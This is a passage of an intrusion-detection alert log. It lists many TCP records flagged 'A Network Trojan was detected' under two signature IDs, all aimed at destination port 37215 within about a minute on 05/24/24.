              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519562
              SID:2835222
              Source Port:56118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.396427
              SID:2829579
              Source Port:51184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.429732
              SID:2829579
              Source Port:50890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459788
              SID:2835222
              Source Port:37784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431656
              SID:2835222
              Source Port:52562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154185
              SID:2829579
              Source Port:55254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.542224
              SID:2835222
              Source Port:41100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.965537
              SID:2835222
              Source Port:33560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.284590
              SID:2829579
              Source Port:45502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.821887
              SID:2835222
              Source Port:58772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.550779
              SID:2829579
              Source Port:58052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.268550
              SID:2829579
              Source Port:40794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.250836
              SID:2829579
              Source Port:51990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078202
              SID:2835222
              Source Port:45080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.374501
              SID:2829579
              Source Port:38906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.114631
              SID:2835222
              Source Port:34740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.108116
              SID:2829579
              Source Port:48150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.868002
              SID:2835222
              Source Port:46620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859556
              SID:2835222
              Source Port:45102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.637941
              SID:2829579
              Source Port:36756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.636793
              SID:2829579
              Source Port:57310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234106
              SID:2829579
              Source Port:54690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.253636
              SID:2835222
              Source Port:49512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.605807
              SID:2829579
              Source Port:51042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.486968
              SID:2835222
              Source Port:52344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.285094
              SID:2829579
              Source Port:51480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313710
              SID:2835222
              Source Port:55320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118985
              SID:2835222
              Source Port:58344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300077
              SID:2829579
              Source Port:51178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.453658
              SID:2829579
              Source Port:41714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574699
              SID:2835222
              Source Port:52568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.621944
              SID:2835222
              Source Port:36664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.462933
              SID:2829579
              Source Port:38214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.693242
              SID:2835222
              Source Port:59526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.549359
              SID:2835222
              Source Port:53416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.744801
              SID:2829579
              Source Port:48882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.988752
              SID:2829579
              Source Port:41124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.332247
              SID:2835222
              Source Port:53728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.701619
              SID:2835222
              Source Port:56092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.631281
              SID:2829579
              Source Port:42988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.707794
              SID:2829579
              Source Port:35844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395465
              SID:2829579
              Source Port:34948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.551290
              SID:2835222
              Source Port:54430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.640468
              SID:2829579
              Source Port:48414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926201
              SID:2835222
              Source Port:49792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.117271
              SID:2829579
              Source Port:60472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.453564
              SID:2835222
              Source Port:38440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.885923
              SID:2829579
              Source Port:59626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.194376
              SID:2835222
              Source Port:37478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308853
              SID:2829579
              Source Port:45834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.631287
              SID:2835222
              Source Port:58562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.532339
              SID:2835222
              Source Port:53922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.481415
              SID:2835222
              Source Port:47636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.582516
              SID:2829579
              Source Port:36858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100797
              SID:2829579
              Source Port:33226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519142
              SID:2829579
              Source Port:34180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187565
              SID:2835222
              Source Port:34322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573290
              SID:2829579
              Source Port:60684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186525
              SID:2829579
              Source Port:58922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.973872
              SID:2829579
              Source Port:53766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.402195
              SID:2829579
              Source Port:40010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.621455
              SID:2835222
              Source Port:54182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188129
              SID:2835222
              Source Port:40928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.579411
              SID:2835222
              Source Port:44030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.269895
              SID:2829579
              Source Port:50180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.539923
              SID:2835222
              Source Port:60450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625190
              SID:2829579
              Source Port:43590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.501937
              SID:2829579
              Source Port:39362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.146981
              SID:2835222
              Source Port:36948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.151153
              SID:2829579
              Source Port:53230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.374143
              SID:2835222
              Source Port:44796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.607097
              SID:2835222
              Source Port:41576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802132
              SID:2835222
              Source Port:44392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448707
              SID:2829579
              Source Port:58164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445589
              SID:2835222
              Source Port:55532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.697513
              SID:2829579
              Source Port:54526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103583
              SID:2835222
              Source Port:48232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.280023
              SID:2829579
              Source Port:42468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.241994
              SID:2829579
              Source Port:59646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.546359
              SID:2829579
              Source Port:37834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.202941
              SID:2835222
              Source Port:36196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923605
              SID:2835222
              Source Port:53840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100509
              SID:2829579
              Source Port:54080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103580
              SID:2835222
              Source Port:43164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.202966
              SID:2835222
              Source Port:59054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.868528
              SID:2835222
              Source Port:53888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536428
              SID:2829579
              Source Port:47920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.193080
              SID:2829579
              Source Port:44006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432239
              SID:2829579
              Source Port:53892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.837255
              SID:2835222
              Source Port:44696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430475
              SID:2835222
              Source Port:56202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.870401
              SID:2829579
              Source Port:51962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535545
              SID:2835222
              Source Port:39634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.598369
              SID:2829579
              Source Port:50598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624451
              SID:2829579
              Source Port:47828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.160356
              SID:2835222
              Source Port:42806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.818102
              SID:2829579
              Source Port:46620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103470
              SID:2835222
              Source Port:32906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.493207
              SID:2835222
              Source Port:41380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.424260
              SID:2835222
              Source Port:37310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.543618
              SID:2829579
              Source Port:57616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.113681
              SID:2829579
              Source Port:49134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154243
              SID:2835222
              Source Port:41016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.636711
              SID:2829579
              Source Port:47552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.870712
              SID:2835222
              Source Port:50874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.195186
              SID:2835222
              Source Port:47028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.868617
              SID:2835222
              Source Port:33868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.480121
              SID:2835222
              Source Port:52078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.671793
              SID:2835222
              Source Port:55512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062222
              SID:2835222
              Source Port:52980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.546349
              SID:2835222
              Source Port:41098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726105
              SID:2835222
              Source Port:33856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.432164
              SID:2829579
              Source Port:60460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459676
              SID:2829579
              Source Port:44264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.455433
              SID:2835222
              Source Port:50002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857817
              SID:2835222
              Source Port:36756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.988556
              SID:2835222
              Source Port:50994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.107979
              SID:2835222
              Source Port:41040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.398235
              SID:2829579
              Source Port:60244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.549232
              SID:2835222
              Source Port:38230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.343544
              SID:2829579
              Source Port:45984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923534
              SID:2829579
              Source Port:44512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.596594
              SID:2835222
              Source Port:40208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.426323
              SID:2835222
              Source Port:42652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.290162
              SID:2829579
              Source Port:39114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.114487
              SID:2829579
              Source Port:34344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517182
              SID:2829579
              Source Port:49662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.285009
              SID:2829579
              Source Port:49138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.460443
              SID:2835222
              Source Port:49160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.153248
              SID:2829579
              Source Port:54070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.162901
              SID:2835222
              Source Port:53246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.075482
              SID:2829579
              Source Port:59990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.553500
              SID:2835222
              Source Port:43474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189475
              SID:2835222
              Source Port:48998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.741286
              SID:2829579
              Source Port:55098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.327826
              SID:2829579
              Source Port:33780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.075428
              SID:2835222
              Source Port:45388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.525339
              SID:2829579
              Source Port:48740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.077039
              SID:2829579
              Source Port:37986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726110
              SID:2835222
              Source Port:46660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.750415
              SID:2829579
              Source Port:58572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234129
              SID:2835222
              Source Port:47434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.860018
              SID:2829579
              Source Port:57456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624445
              SID:2829579
              Source Port:35142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538167
              SID:2829579
              Source Port:33506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.692509
              SID:2835222
              Source Port:46456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397910
              SID:2829579
              Source Port:51040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.327825
              SID:2829579
              Source Port:49516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308692
              SID:2829579
              Source Port:60534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.542391
              SID:2835222
              Source Port:59258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.636542
              SID:2829579
              Source Port:47198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.982229
              SID:2835222
              Source Port:42144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.115251
              SID:2835222
              Source Port:44670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459561
              SID:2835222
              Source Port:57014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.111911
              SID:2835222
              Source Port:44202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.147084
              SID:2835222
              Source Port:59880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.365266
              SID:2835222
              Source Port:46586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.122720
              SID:2835222
              Source Port:45908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858464
              SID:2835222
              Source Port:39476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.494317
              SID:2829579
              Source Port:48934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.700969
              SID:2835222
              Source Port:33140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.634782
              SID:2835222
              Source Port:53182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100948
              SID:2829579
              Source Port:41002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.799061
              SID:2835222
              Source Port:57312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300386
              SID:2829579
              Source Port:45114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055309
              SID:2829579
              Source Port:36604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.522543
              SID:2835222
              Source Port:33388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187102
              SID:2829579
              Source Port:35518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664573
              SID:2835222
              Source Port:51216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.456942
              SID:2829579
              Source Port:60442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187404
              SID:2835222
              Source Port:39890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.918114
              SID:2829579
              Source Port:47338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.447213
              SID:2835222
              Source Port:59560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.452798
              SID:2829579
              Source Port:41966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.333856
              SID:2835222
              Source Port:55476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.540602
              SID:2835222
              Source Port:36744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.549362
              SID:2829579
              Source Port:41722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638290
              SID:2835222
              Source Port:45572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.149130
              SID:2835222
              Source Port:39896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.063056
              SID:2835222
              Source Port:59460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.078132
              SID:2835222
              Source Port:49426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.965826
              SID:2835222
              Source Port:58428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.283456
              SID:2829579
              Source Port:48716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.583898
              SID:2835222
              Source Port:37028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575509
              SID:2829579
              Source Port:59522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663522
              SID:2835222
              Source Port:39754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334171
              SID:2835222
              Source Port:57620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118415
              SID:2835222
              Source Port:43066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.870129
              SID:2835222
              Source Port:55454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.474113
              SID:2829579
              Source Port:36488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624757
              SID:2829579
              Source Port:33696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.151238
              SID:2835222
              Source Port:38360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.130138
              SID:2829579
              Source Port:58034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.507602
              SID:2835222
              Source Port:59306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.534393
              SID:2835222
              Source Port:41024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.164096
              SID:2829579
              Source Port:45092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396759
              SID:2835222
              Source Port:47592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
